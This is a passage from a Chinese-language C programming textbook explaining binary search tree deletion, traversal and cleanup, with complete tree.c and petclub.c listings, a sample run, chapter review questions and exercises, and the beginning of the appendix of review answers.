部分分离。为了修正这种情况,要把被删除节点父节点中储存该节点的地址 更新为该节点子树的地址(见图17.14)。 1410 图17.14 删除有一个子节点的节点 最后一种情况是删除有两个子树的节点。其中一个子树(如左子树)可 连接在被删除节点之前连接的位置。但是,另一个子树怎么处理?牢记树的 基本设计:左子树的所有项都在父节点项的前面,右子树的所有项都在父节 点项的后面。也就是说,右子树的所有项都在左子树所有项的后面。而且, 因为该右子树曾经是被删除节点的父节点的左子树的一部分,所以该右节点 中的所有项在被删除节点的父节点项的前面。想像一下如何在树中从上到下 查找该右子树的头所在的位置。它应该在被删除节点的父节点的前面,所以 要沿着父节点的左子树向下找。但是,该右子树的所有项又在被删除节点左 子树所有项的后面。因此要查看左子树的右支是否有新节点的空位。如果没 1411 有,就要沿着左子树的右支向下找,一直找到一个空位为止。图17.15演示 了这种方法。 图17.15 删除一个有两个子节点的项 ① 删除一个节点 现在可以设计所需的函数了,可以分成两个任务:第一个任务是把特定 项与待删除节点关联;第二个任务是删除节点。无论哪种情况都必须修改待 删除项父节点的指针。因此,要注意以下两点。 1412 该程序必须标识待删除节点的父节点。 为了修改指针,代码必须把该指针的地址传递给执行删除任务的函数。 第一点稍后讨论,下面先分析第二点。要修改的指针本身是Trnode *类 型,即指向Trnode的指针。由于该函数的参数是该指针的地址,所以参数的 类型是Trnode **,即指向指针(该指针指向Trnode)的指针。假设有合适的 地址可用,可以这样编写执行删除任务的函数: static void DeleteNode(Trnode **ptr) /* ptr 是指向目标节点的父节点指针成员的地址 */ { Trnode * temp; if ((*ptr)->left == NULL) { temp = *ptr; *ptr = (*ptr)->right; free(temp); } else if ((*ptr)->right == NULL) { temp = *ptr; *ptr = (*ptr)->left; 1413 free(temp); } else /* 被删除的节点有两个子节点 */ { /* 找到重新连接右子树的位置 */ for (temp = (*ptr)->left; temp->right != NULL; temp = temp->right) continue; temp->right = (*ptr)->right; temp = *ptr; *ptr = (*ptr)->left; free(temp); } } 该函数显式处理了 3 种情况:没有左子节点的节点、没有右子节点的节 点和有两个子节点的节点。无子节点的节点可作为无左子节点的节点的特 例。如果该节点没有左子节点,程序就将右子节点的地址赋给其父节点的指 针。如果该节点也没有右子节点,则该指针为NULL。这就是无子节点情况 的值。 注意,代码中用临时指针记录被删除节点的地址。被删除节点的父节点 指针(*ptr)被重置后,程序会丢失被删除节点的地址,但是free()函数需要 1414 这个信息。所以,程序把*ptr的原始值储存在temp中,然后用free()函数使用 temp来释放被删除节点所占用的内存。 有两个子节点的情况,首先在for循环中通过temp指针从左子树的右半 部分向下查找一个空位。找到空位后,把右子树连接于此。然后,再用 temp 保存被删除节点的位置。接下来,把左子树连接到被删除节点的父节 点上,最后释放temp指向的节点。 注意,由于ptr的类型是Trnode **,所以*ptr的类型是Trnode *,与temp的 类型相同。 ② 删除一个项 剩下的问题是把一个节点与特定项相关联。可以使用SeekItem()函数来 完成。回忆一下,该函数返回一个结构(内含两个指针,一个指针指向父节 点,一个指针指向包含特定项的节点)。然后就可以通过父节点的指针获得 相应的地址传递给DeleteNode()函数。根据这个思路,DeleteNode()函数的定 义如下: bool DeleteItem(const Item * pi, Tree * ptree) { Pair look; look = SeekItem(pi, ptree); if (look.child == NULL) return false; if (look.parent == NULL)  /* 删除根节点 */ DeleteNode(&ptree->root); 1415 else if (look.parent->left == look.child) DeleteNode(&look.parent->left); else DeleteNode(&look.parent->right); ptree->size--; return true; } 首先,SeekItem()函数的返回值被赋给look类型的结构变量。如果 look.child是NULL,表明未找到指定项,DeleteItem()函数退出,并返回 false。如果找到了指定的Item,该函数分3种情况来处理。第一种情况是, look.parent的值为NULL,这意味着该项在根节点中。在这情况下,不用更新 父节点,但是要更新Tree结构中根节点的指针。因此,函数该函数把该指针 的地址传递给DeleteNode()函数。否则(即剩下两种情况),程序判断待删 除节点是其父节点的左子节点还是右子节点,然后传递合适指针的地址。 注意,公共接口函数(DeleteItem())处理的是最终用户所关心的问题 (项和树),而隐藏的DeleteNode()函数处理的是与指针相关的实质性任 务。 4.遍历树 遍历树比遍历链表更复杂,因为每个节点都有两个分支。这种分支特性 很适合使用分而制之的递归(详见第9章)来处理。对于每一个节点,执行 遍历任务的函数都要做如下的工作: 处理节点中的项; 处理左子树(递归调用); 1416 处理右子树(递归调用)。 可以把遍历分成两个函数来完成:Traverse()和InOrder()。注意, InOrder()函数处理左子树,然后处理项,最后处理右子树。这种遍历树的顺 序是按字母排序进行。如果你有时间,可以试试用不同的顺序,比如,项- 左子树-右子树或者左子树-右子树-项,看看会发生什么。 void Traverse(const Tree * ptree, void(*pfun)(Item item)) { if (ptree != NULL) InOrder(ptree->root, pfun); } static void InOrder(const Trnode * root, void(*pfun)(Item item)) { if (root != NULL) { InOrder(root->left, pfun); (*pfun)(root->item); InOrder(root->right, pfun); } } 5.清空树 1417 清空树基本上和遍历树的过程相同,即清空树的代码也要访问每个节 点,而且要用 free()函数释放内存。除此之外,还要重置Tree类型结构的成 员,表明该树为空。DeleteAll()函数负责处理Tree类型的结构,把释放内存 的任务交给 DeleteAllNode()函数。DeleteAllNode()与 InOrder()函数的构造相 同,它储存了指针的值root->right,使其在释放根节点后仍然可用。下面是 这两个函数的代码: void DeleteAll(Tree * ptree) { if (ptree != NULL) DeleteAllNodes(ptree->root); ptree->root = NULL; ptree->size = 0; } static void DeleteAllNodes(Trnode * root) { Trnode * pright; if (root != NULL) { pright = root->right; DeleteAllNodes(root->left); free(root); 1418 DeleteAllNodes(pright); } } 6.完整的包 程序清单17.11演示了整个tree.c的代码。tree.h和tree.c共同组成了树的程 序包。 程序清单17.11 tree.c程序 /* tree.c -- 树的支持函数 */ #include <string.h> #include <stdio.h> #include <stdlib.h> #include "tree.h" /* 局部数据类型 */ typedef struct pair { Trnode * parent; Trnode * child; } Pair; /* 局部函数的原型 */ static Trnode * MakeNode(const Item * pi); 1419 static bool ToLeft(const Item * i1, const Item * i2); static bool ToRight(const Item * i1, const Item * i2); static void AddNode(Trnode * new_node, Trnode * root); static void InOrder(const Trnode * root, void(*pfun)(Item item)); static Pair SeekItem(const Item * pi, const Tree * ptree); static void DeleteNode(Trnode **ptr); static void DeleteAllNodes(Trnode * ptr); /* 函数定义 */ void InitializeTree(Tree * ptree) { ptree->root = NULL; ptree->size = 0; } bool TreeIsEmpty(const Tree * ptree) { if (ptree->root == NULL) return true; else return false; 1420 } bool TreeIsFull(const Tree * ptree) { if (ptree->size == MAXITEMS) return true; else return false; } int TreeItemCount(const Tree * ptree) { return ptree->size; } bool AddItem(const Item * pi, Tree * ptree) { Trnode * new_node; if (TreeIsFull(ptree)) { fprintf(stderr, "Tree is full\n"); return false;     /* 提前返回  */ 1421 } if (SeekItem(pi, ptree).child != NULL) { fprintf(stderr, "Attempted to add duplicate item\n"); return false;     /* 提前返回  */ } new_node = MakeNode(pi);  /* 指向新节点 */ if (new_node == NULL) { fprintf(stderr, "Couldn't create node\n"); return false;     /* 提前返回  */ } /* 成功创建了一个新节点 */ ptree->size++; if (ptree->root == NULL)      /* 情况1:树为空    */ ptree->root = new_node;     /* 新节点为树的根节点  */ else                /* 情况2:树不为空   */ AddNode(new_node, ptree->root);/* 在树中添加新节点   */ return true;            /* 成功返回      */ 1422 } bool InTree(const Item * pi, const Tree * ptree) { return (SeekItem(pi, ptree).child == NULL) ? false : true; } bool DeleteItem(const Item * pi, Tree * ptree) { Pair look; look = SeekItem(pi, ptree); if (look.child == NULL) return false; if (look.parent == NULL)      /* 删除根节点项     */ DeleteNode(&ptree->root); else if (look.parent->left == look.child) DeleteNode(&look.parent->left); else DeleteNode(&look.parent->right); ptree->size--; return true; 1423 } void Traverse(const Tree * ptree, void(*pfun)(Item item)) { if (ptree != NULL) InOrder(ptree->root, pfun); } void DeleteAll(Tree * ptree) { if (ptree != NULL) DeleteAllNodes(ptree->root); ptree->root = NULL; ptree->size = 0; } /* 局部函数 */ static void InOrder(const Trnode * root, void(*pfun)(Item item)) { if (root != NULL) { InOrder(root->left, pfun); 1424 (*pfun)(root->item); InOrder(root->right, pfun); } } static void DeleteAllNodes(Trnode * root) { Trnode * pright; if (root != NULL) { pright = root->right; DeleteAllNodes(root->left); free(root); DeleteAllNodes(pright); } } static void AddNode(Trnode * new_node, Trnode * root) { if (ToLeft(&new_node->item, &root->item)) { 1425 if (root->left == NULL)       /* 空子树       */ root->left = new_node;     /* 把节点添加到此处   */ else AddNode(new_node, root->left); /* 否则处理该子树    */ } else if (ToRight(&new_node->item, &root->item)) { if (root->right == NULL) root->right = new_node; else AddNode(new_node, root->right); } else                  /* 不允许有重复项    */ { fprintf(stderr, "location error in AddNode()\n"); exit(1); } } 1426 static bool ToLeft(const Item * i1, const Item * i2) { int comp1; if ((comp1 = strcmp(i1->petname, i2->petname)) < 0) return true; else if (comp1 == 0 &&strcmp(i1->petkind, i2->petkind) < 0) return true; else return false; } static bool ToRight(const Item * i1, const Item * i2) { int comp1; if ((comp1 = strcmp(i1->petname, i2->petname)) > 0) return true; else if (comp1 == 0 && strcmp(i1->petkind, i2->petkind) > 0) return true; else 1427 return false; } static Trnode * MakeNode(const Item * pi) { Trnode * new_node; new_node = (Trnode *) malloc(sizeof(Trnode)); if (new_node != NULL) { new_node->item = *pi; new_node->left = NULL; new_node->right = NULL; } return new_node; } static Pair SeekItem(const Item * pi, const Tree * ptree) { Pair look; look.parent = NULL; look.child = ptree->root; 1428 if (look.child == NULL) return look;          /* 提前返回  */ while (look.child != NULL) { if (ToLeft(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->left; } else if (ToRight(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->right; } else       /* 如果前两种情况都不满足,则必定是相等的情 况   */ break;    /* look.child 目标项的节点          */ } return look;          /* 成功返回 */ 1429 } static void DeleteNode(Trnode **ptr) /* ptr 是指向目标节点的父节点指针成员的地址 */ { Trnode * temp; if ((*ptr)->left == NULL) { temp = *ptr; *ptr = (*ptr)->right; free(temp); } else if ((*ptr)->right == NULL) { temp = *ptr; *ptr = (*ptr)->left; free(temp); } else  /* 被删除的节点有两个子节点 */ { 1430 /* 找到重新连接右子树的位置 */ for (temp = (*ptr)->left; temp->right != NULL;temp = temp->right) continue; temp->right = (*ptr)->right; temp = *ptr; *ptr = (*ptr)->left; free(temp); } } 17.7.4 使用二叉树 现在,有了接口和函数的实现,就可以使用它们了。程序清单17.12中 的程序以菜单的方式提供选择:向俱乐部成员花名册添加宠物、显示成员列 表、报告成员数量、核实成员及退出。main()函数很简单,主要提供程序的 大纲。具体工作主要由支持函数来完成。 程序清单17.12 petclub.c程序 /* petclub.c -- 使用二叉查找数 */ #include <stdio.h> #include <string.h> #include <ctype.h> #include "tree.h" 1431 char menu(void); void addpet(Tree * pt); void droppet(Tree * pt); void showpets(const Tree * pt); void findpet(const Tree * pt); void printitem(Item item); void uppercase(char * str); char * s_gets(char * st, int n); int main(void) { Tree pets; char choice; InitializeTree(&pets); while ((choice = menu()) != 'q') { switch (choice) { case 'a':  addpet(&pets); break; 1432 case 'l':  showpets(&pets); break; case 'f':  findpet(&pets); break; case 'n':  printf("%d pets in club\n", TreeItemCount(&pets)); break; case 'd':  droppet(&pets); break; default:  puts("Switching error"); } } DeleteAll(&pets); puts("Bye."); return 0; } char menu(void) { int ch; 1433 puts("Nerfville Pet Club Membership Program"); puts("Enter the letter corresponding to your choice:"); puts("a) add a pet       l) show list of pets"); puts("n) number of pets   f) find pets"); puts("d) delete a pet     q) quit"); while ((ch = getchar()) != EOF) { while (getchar() != '\n') /* 处理输入行的剩余内容 */ continue; ch = tolower(ch); if (strchr("alrfndq", ch) == NULL) puts("Please enter an a, l, f, n, d, or q:"); else break; } if (ch == EOF)   /* 使程序退出 */ ch = 'q'; return ch; } 1434 void addpet(Tree * pt) { Item temp; if (TreeIsFull(pt)) puts("No room in the club!"); else { puts("Please enter name of pet:"); s_gets(temp.petname, SLEN); puts("Please enter pet kind:"); s_gets(temp.petkind, SLEN); uppercase(temp.petname); uppercase(temp.petkind); AddItem(&temp, pt); } } void showpets(const Tree * pt) { if (TreeIsEmpty(pt)) 1435 puts("No entries!"); else Traverse(pt, printitem); } void printitem(Item item) { printf("Pet: %-19s  Kind: %-19s\n", item.petname,item.petkind); } void findpet(const Tree * pt) { Item temp; if (TreeIsEmpty(pt)) { puts("No entries!"); return;  /* 如果树为空,则退出该函数 */ } puts("Please enter name of pet you wish to find:"); s_gets(temp.petname, SLEN); puts("Please enter pet kind:"); 1436 s_gets(temp.petkind, SLEN); uppercase(temp.petname); uppercase(temp.petkind); printf("%s the %s ", temp.petname, temp.petkind); if (InTree(&temp, pt)) printf("is a member.\n"); else printf("is not a member.\n"); } void droppet(Tree * pt) { Item temp; if (TreeIsEmpty(pt)) { puts("No entries!"); return;  /* 如果树为空,则退出该函数 */ } puts("Please enter name of pet you wish to delete:"); s_gets(temp.petname, SLEN); 1437 puts("Please enter pet kind:"); s_gets(temp.petkind, SLEN); uppercase(temp.petname); uppercase(temp.petkind); printf("%s the %s ", temp.petname, temp.petkind); if (DeleteItem(&temp, pt)) printf("is dropped from the club.\n"); else printf("is not a member.\n"); } void uppercase(char * str) { while (*str) { *str = toupper(*str); str++; } } char * s_gets(char * st, int n) 1438 { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)        // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;    // 处理输入行的剩余内容 } return ret_val; } 该程序把所有字母都转换为大写字母,所以SNUFFY、Snuffy和snuffy都 被视为相同。下面是该程序的一个运行示例: Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: 1439 a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit a Please enter name of pet: Quincy Please enter pet kind: pig Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit a Please enter name of pet: Bennie Haha Please enter pet kind: parrot Nerfville Pet Club Membership Program 1440 Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit a Please enter name of pet: Hiram Jinx Please enter pet kind: domestic cat Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit n 3 pets in club Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets 1441 n) number of pets     f) find pets q) quit l Pet: BENNIE HAHA         Kind: PARROT Pet: HIRAM JINX          Kind: DOMESTIC CAT Pet: QUINCY             Kind: PIG Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit q Bye. 17.7.5 树的思想 二叉查找树也有一些缺陷。例如,二叉查找树只有在满员(或平衡)时 效率最高。假设要储存用户随机输入的单词。该树的外观应如图17.12所 示。现在,假设用户按字母顺序输入数据,那么每个新节点应该被添加到右 边,该树的外观应如图17.16所示。图17.12所示是平衡的树,图17.16所示是 不平衡的树。查找这种树并不比查找链表要快。 避免串状树的方法之一是在创建树时多加注意。如果树或子树的一边或 另一边太不平衡,就需要重新排列节点使之恢复平衡。与此类似,可能在进 1442 行删除操作后要重新排列树。俄国数学家Adel’son-Vel’skii和Landis发明了一 种算法来解决这个问题。根据他们的算法创建的树称为AVL树。因为要重 构,所以创建一个平衡的树所花费的时间更多,但是这样的树可以确保最大 化搜索效率。 你可能需要一个能储存相同项的二叉查找树。例如,在分析一些文本 时,统计某个单词在文本中出现的次数。一种方法是把 Item 定义成包含一 个单词和一个数字的结构。第一次遇到一个单词时,将其添加到树中,并且 该单词的数量加 1。下一次遇到同样的单词时,程序找到包含该单词的节 点,并递增表示该单词数量的值。把基本二叉查找树修改成具有这一特性, 不费多少工夫。 考虑Nerfville宠物俱乐部的示例,有另一种情况。示例中的树根据宠物 的名字和种类进行排列,所以,可以把名为Sam的猫储存在一个节点中,把 名为Sam的狗储存在另一节点中,把名为Sam的山羊储存在第3个节点中。但 是,不能储存两只名为Sam的猫。另一种方法是以名字来排序,但是这样做 只能储存一个名为Sam的宠物。还需要把Item定义成多个结构,而不是一个 结构。第一次出现Sally时,程序创建一个新的节点,并创建一个新的列 表,然后把Sally及其种类添加到列表中。下一次出现Sally时,程序将定位 到之前储存Sally的节点,并把新的数据添加到结构列表中。 提示 插件库 读者可能意识到实现一个像链表或树这样的ADT比较困难,很容易犯 错。插件库提供了一种可选的方法:让其他人来完成这些工作和测试。在学 完本章这两个相对简单的例子后,读者应该能很好地理解和认识这样的库。 1443 图17.16 不平衡的二叉查找树 1444 17.8 其他说明 本书中,我们涵盖了C语言的基本特性,但是只是简要介绍了库。ANSI C库中包含多种有用的函数。绝大部分实现都针对特定的系统提供扩展库。 基于Windows的编译器支持Windows图形接口。Macintosh C编译器提供访问 Macintosh 工具箱的函数,以便编写具有标准 Macintosh 接口或 iOS 系统的程 序产品,如iPhone或iPad。与此类似,还有一些工具用于创建Linux程序的图 形接口。花时间查看你的系统提供什么。如果没有你想要的工具,就自己编 写函数。这是C的一部分。如果认为自己能编写一个更好的(如,输入函 数),那就去做!随着你不断练习并提高自己的编程技术,会从一名新手成 为经验丰富的资深程序员。 如果对链表、队列和树的相关概念感兴趣或觉得很有用,可以阅读其他 相关的书籍,学习高级编程技巧。计算机科学家在开发和分析算法以及如何 表示数据方面投入了大量的时间和精力。也许你会发现已经有人开发了你正 需要的工具。 学会C语言后,你可能想研究C++、Objectiv C或Java。这些都是以C为 基础的面向对象(object-oriented)语言。C已经涵盖了从简单的char类型变 量到大型且复杂的结构在内的数据对象。面向对象语言更进一步发展了对象 的观点。例如,对象的性质不仅包括它所储存的信息类型,而且还包括了对 其进行的操作类型。本章介绍的ADT就遵循了这种模式。而且,对象可以继 承其他对象的属性。OOP提供比C更高级的抽象,很适合编写大型程序。 请参阅附录B中的参考资料I“补充阅读”中找到你感兴趣的书籍。 1445 17.9 关键概念 一种数据类型通过以下几点来表征:如何构建数据、如何储存数据、有 哪些可能的操作。抽象数据类型(ADT)以抽象的方式指定构成某种类型特 征的属性和操作。从概念上看,可以分两步把ADT翻译成一种特定的编程语 言。第1步是定义编程接口。在C中,通过使用头文件定义类型名,并提供 与允许的操作相应的函数原型来实现。第2步是实现接口。在C中,可以用 源代码文件提供与函数原型相应的函数定义来实现。 1446 17.10 本章小结 链表、队列和二叉树是ADT在计算机程序设计中常用的示例。通常用动 态内存分配和链式结构来实现它们,但有时用数组来实现会更好。 当使用一种特定类型(如队列或树)进行编程时,要根据类型接口来编 写程序。这样,在修改或改进实现时就不用更改使用接口的那些程序。 1447 17.11 复习题 1.定义一种数据类型涉及哪些内容? 2.为什么程序清单17.2 只能沿一个方向遍历链表?如何修改struct film定 义才能沿两个方向遍历链表? 3.什么是ADT? 4.QueueIsEmpty()函数接受一个指向queue结构的指针作为参数,但是也 可以将其编写成接受一个queue结构作为参数。这两种方式各有什么优缺 点? 5.栈(stack)是链表系列的另一种数据形式。在栈中,只能在链表的一 端添加和删除项,项被“压入”栈和“弹出”栈。因此,栈是一种LIFO(即后进 先出last in,first out)结构。 a.设计一个栈ADT b.为栈设计一个C编程接口,例如stack.h头文件 6.在一个含有3个项的分类列表中,判断一个特定项是否在该列表中, 用顺序查找和二叉查找方法分别需要最多多少次?当列表中有1023个项时分 别是多少次?65535个项是分别是多少次? 7.假设一个程序用本章介绍的算法构造了一个储存单词的二叉查找树。 假设根据下面所列的顺序输入 单词,请画出每种情况的树: a.nice food roam dodge gate office wave b.wave roam office nice gate food dodge c.food dodge roam wave office gate nice 1448 d.nice roam office food wave gate dodge 8.考虑复习题7构造的二叉树,根据本章的算法,删除单词food之后, 各树是什么样子? 1449 17.12 编程练习 1.修改程序清单17.2,让该程序既能正序也能逆序显示电影列表。一种 方法是修改链表的定义,可以双向遍历链表。另一种方法是用递归。 2.假设list.h(程序清单17.3)使用下面的list定义: typedef struct list { Node * head;  /* 指向list的开头 */ Node * end;/* 指向list的末尾 */ } List; 重写 list.c(程序清单 17.5)中的函数以适应新的定义,并通过 films.c(程序清单 17.4)测试最终的代码。 3.假设list.h(程序清单17.3)使用下面的list定义: #define MAXSIZE 100 typedef struct list { Item entries[MAXSIZE]; /* 内含项的数组 */ int items;       /* list中的项数 */ } List; 重写 list.c(程序清单 17.5)中的函数以适应新的定义,并通过 films.c(程序清单 17.4)测试最终的代码。 1450 4.重写mall.c(程序清单17.7),用两个队列模拟两个摊位。 5.编写一个程序,提示用户输入一个字符串。然后该程序把该字符串的 字符逐个压入一个栈(参见复习题5),然后从栈中弹出这些字符,并显示 它们。结果显示为该字符串的逆序。 6.编写一个函数接受 3 个参数:一个数组名(内含已排序的整数)、该 数组的元素个数和待查找的整数。如果待查找的整数在数组中,那么该函数 返回 1;如果该数不在数组中,该函数则返回 0。用二分查找法实现。 7.编写一个程序,打开和读取一个文本文件,并统计文件中每个单词出 现的次数。用改进的二叉查找树储存单词及其出现的次数。程序在读入文件 后,会提供一个有3个选项的菜单。第1个选项是列出所有的单词和出现的次 数。第2个选项是让用户输入一个单词,程序报告该单词在文件中出现的次 数。第3个选项是退出。 8.修改宠物俱乐部程序,把所有同名的宠物都储存在同一个节点中。当 用户选择查找宠物时,程序应询问用户该宠物的名字,然后列出该名字的所 有宠物(及其种类)。 1451 附录A 复习题答案 A.1 第1章复习题答案 1.完美的可移植程序是,其源代码无需修改就能在不同计算机系统中成 功编译的程序。 2.源代码文件包含程序员使用的任何编程语言编写的代码。目标代码文 件包含机器语言代码,它不必是完整的程序代码。可执行文件包含组成可执 行程序的完整机器语言代码。 3.(1)定义程序目标;(2)设计程序;(3)编写程序;(4)编译程 序;(5)运行程序;(6)测试和调试程序;(7)维护和修改程序。 4.编译器把源代码(如,用C语言编写的代码)翻译成等价的机器语言 代码(也叫作目标代码)。 5.链接器把编译器翻译好的源代码以及库代码和启动代码组合起来,生 成一个可执行程序。 A.2 第2章复习题答案 1.它们都叫作函数。 2.语法错误违反了组成语句或程序的规则。这是一个有语法错误的英文 例子:Me speak English good.。这是一个有语法错误的C语言例子: printf"Where are the parentheses?";。 3.语义错误是指含义错误。这是一个有语义错误的英文例子:This sentence isexcellent Czech.[1]。这是一个有语义错误的C语言例子: thrice_n = 3 + n;[2]。 4.第1行:以一个#开始;studio.h应改成stdio.h;然后用一对尖括号把 1452 stdio.h括起来。 第2行:把{}改成();注释末尾把/*改成*/。 第3行:把(改成{ 第4行:int s末尾加上一个分号。 第5行没问题。 第6行:把:=改成,赋值用=,而不是用:=(这说明Indiana Sloth了解 Pascal)。另外,用于赋值的值56也不对,一年有52周,不是56周。 第7行应该是:printf("There are %d weeks in a year.\n", s); 第9行:原程序中没有第9行,应该在该行加上一个右花括号}。 修改后的程序如下: #include <stdio.h> int main(void) /* this prints the number of weeks in a year */ { int s; s = 52; printf("There are %d weeks in a year.\n", s); return 0; } 5.a.Baa Baa Black Sheep.Have you any wool?(注意,Sheep.和Have之间 没有空格) 1453 b.Begone! O creature of lard! c.What? No/nfish? (注意斜杠/和反斜杠\的效果不同,/只是一个普通的字符,原样打印) d.2 + 2 = 4 (注意,每个%d与列表中的值相对应。还要注意,+的意思是加法,可 以在printf()语句内部计算) 6.关键字是int和char(main是一个函数名;function是函数的意思;=是 一个运算符)。 7.printf("There were %d words and %d lines.\n", words, lines); 8.执行完第7行后,a是5,b是2。执行完第8行后,a和b都是5。执行完 第9行后,a和b仍然是5(注意,a不会是2,因为在执行a = b;时,b的值已经 被改为5)。 9.执行完第7行后,x是10,b是5。执行完第8行后,x是10,y是15。执 行完第9行后,x是150,y是15。 A.3 第3章复习题答案 1.a.int类型,也可以是short类型或unsigned short类型。人口数是一个整 数。 b.float类型,价格通常不是一个整数(也可以使用double类型,但实际 上不需要那么高的精度)。 c.char类型。 1454 d.int类型,也可以是unsigned类型。 2.原因之一:在系统中要表示的数超过了int可表示的范围,这时要使用 long类型。原因之二:如果要处理更大的值,那么使用一种在所有系统上都 保证至少是 32 位的类型,可提高程序的可移植性。 3.如果要正好获得32位的整数,可以使用int32_t类型。要获得可储存至 少32位整数的最小类型,可以使用int_least32_t类型。如果要为32位整数提 供最快的计算速度,可以选择int_fast32_t类型(假设你的系统已定义了上述 类型)。 4.a.char类型常量(但是储存为int类型) b.int类型常量 c.double类型常量 d.unsigned int类型常量,十六进制格式 e.double类型常量 5.第1行:应该是#include <stdio.h> 第2行:应该是int main(void) 第3行:把(改为{ 第4行:g和h之间的;改成, 第5行:没问题 第6行:没问题 第7行:虽然这数字比较大,但在e前面应至少有一个数字,如1e21或 1.0e21都可以。 1455 第8行:没问题,至少没有语法问题。 第9行:把)改成} 除此之外,还缺少一些内容。首先,没有给rate变量赋值;其次未使用h 变量;而且程序不会报告计算结果。虽然这些错误不会影响程序的运行(编 译器可能给出变量未被使用的警告),但是它们确实与程序设计的初衷不符 合。另外,在该程序的末尾应该有一个return语句。 下面是一个正确的版本,仅供参考: #include <stdio.h> int main(void) { float g, h; float tax, rate; rate = 0.08; g = 1.0e5; tax = rate*g; h = g + tax; printf("You owe $%f plus $%f in taxes for a total of $%f.\n", g, tax, h); return 0; } 6. 1456 7. 8.printf("The odds against the %d were %ld to 1.\n", imate, shot);printf("A score of %f is not an %c grade.\n", log, grade); 9.ch = '\r'; ch = 13; ch = '\015' ch = '\xd' 10.最前面缺少一行(第0行):#include <stdio.h> 第1行:使用/*和*/把注释括起来,或者在注释前面使用//。 第3行:int cows, legs; 第4行:country?\n"); 1457 第5行:把%c改为%d,把legs改为&legs。 第7行:把%f改为%d。 另外,在程序末尾还要加上return语句。 下面是修改后的版本: #include <stdio.h> int main(void) /* this program is perfect */ { int cows, legs; printf("How many cow legs did you count?\n"); scanf("%d", &legs); cows = legs / 4; printf("That implies there are %d cows.\n", cows); return 0; } 11.a.换行字符 b.反斜杠字符 c.双引号字符 d.制表字符 A.4 第4章复习题答案 1458 1.程序不能正常运行。第1 个scanf()语句只读取用户输入的名,而用户 输入的姓仍留在输入缓冲区中(缓冲区是用于储存输入的临时存储区)。下 一条scang()语句在输入缓冲区查找重量时,从上次读入结束的地方开始读 取。这样就把留在缓冲区的姓作为体重来读取,导致 scanf()读取失败。另一 方面,如果在要求输入姓名时输入Lasha 144,那么程序会把144作为用户的 体重(虽然用户是在程序提示输入体重之前输入了144)。 2.a.He sold the painting for $234.50. b.Hi!(注意,第1个字符是字符常量;第2个字符由十进制整数转换而 来;第3个字符是八进制字符常量的ASCII表示) c.His Hamlet was funny without being vulgar.has 42 characters. d.Is 1.20e+003 the same as 1201.00? 3.在这条语句中使用\":printf("\"%s\"\nhas %d characters.\n", Q, strlen(Q)); 4.下面是修改后的程序: #include <stdio.h>   /* 别忘了要包含合适的头文件 */ #define B "booboo"   /* 添加#、双引号 */ #define X 10     /* 添加# */ int main(void)    /* 不是main(int) */ { int age; int xp;      /* 声明所有的变量 */ char name[40];   /* 把name声明为数组 */ 1459 printf("Please enter your first name.\n"); /* 添加\n,提高可读性 */ scanf("%s", name); printf("All right, %s, what's your age?\n", name); /* %s用于打印字符串*/ scanf("%d", &age); /* 把%f改成%d,把age改成&age */ xp = age + X; printf("That's a %s! You must be at least %d.\n", B, xp); return 0; /* 不是rerun */ } 5.记住,要打印%必须用%%: printf("This copy of \"%s\" sells for $%0.2f.\n", BOOK, cost); printf("That is %0.0f%% of list.\n", percent); 6.a.%d b.%4X c.%10.3f d.%12.2e e.%-30s 7.a.%15lu b.%#4x c.%-12.2E 1460 d.%+10.3f e.%8.8s 8.a.%6.4d b.%*o c.%2c d.%+0.2f e.%-7.5s 9.a.int dalmations; scanf("%d", &dalmations); b.float kgs, share; scanf("%f%f", &kgs, &share); (注意:对于本题的输入,可以使用转换字符e、f和g。另外,除了%c 之外,在%和转换字符之间加空格不会影响最终的结果) c.char pasta[20]; scanf("%s", pasta); d.char action[20]; int value; scanf("%s %d", action, &value); e.int value; 1461 scanf("%*s %d", &value); 10.空白包括空格、制表符和换行符。C 语言使用空白分隔记号。scanf() 使用空白分隔连续的输入项。 11.%z 中的 z 是修饰符,不是转换字符,所以要在修饰符后面加上一个 它修饰的转换字符。可以使用%zd打印十进制数,或用不同的说明符打印不 同进制的数,例如,%zx打印十六进制的数。 12.可以分别把(和)替换成{和}。但是预处理器无法区分哪些圆括号应替 换成花括号,哪些圆括号不能替换成花括号。因此, #define ( { #define ) } int main(void) ( printf("Hello, O Great One!\n"); ) 将变成: int main{void} { printf{"Hello, O Great One!\n"}; } A.5 第5章复习题答案 1462 1.a.30 b.27(不是3)。(12+6)/(2*3)得3。 c.x = 1,y = 1(整数除法)。 d.x = 3(整数除法),y = 9。 2.a.6(由3 + 3.3截断而来) b.52 c.0(0 * 22.0的结果) d.13(66.0 / 5或13.2,然后把结果赋给int类型变量) 3.a.37.5(7.5 * 5.0的结果) b.1.5(30.0 / 20.0的结果) c.35(7 * 5的结果) d.37(150 / 4的结果) e.37.5(7.5 * 5的结果) f.35.0(7 * 5.0的结果) 4.第0行:应增加一行#include <stdio.h>。 第3行:末尾用分号,而不是逗号。 第6行:while语句创建了一个无限循环。因为i的值始终为1,所以它总 是小于30。推测一下,应该是想写while(i++ < 30)。 第6~8行:这样的缩进布局不能使第7行和第8行组成一个代码块。由于 没有用花括号括起来, while循环只包括第7行,所以要添加花括号。 1463 第7行:因为1和i都是整数,所以当i为1时,除法的结果是1;当i为更大 的数时,除法结果为0。用n = 1.0/i,i在除法运算之前会被转换为浮点数, 这样就能得到非零值。 第8行:在格式化字符串中没有换行符(\n),这导致数字被打印成一 行。 第10行:应该是return 0; 下面是正确的版本: #include <stdio.h> int main(void) { int i = 1; float n; printf("Watch out! Here come a bunch of fractions!\n"); while (i++ < 30) { n = 1.0/i; printf(" %f\n", n); } printf("That's all, folks!\n"); 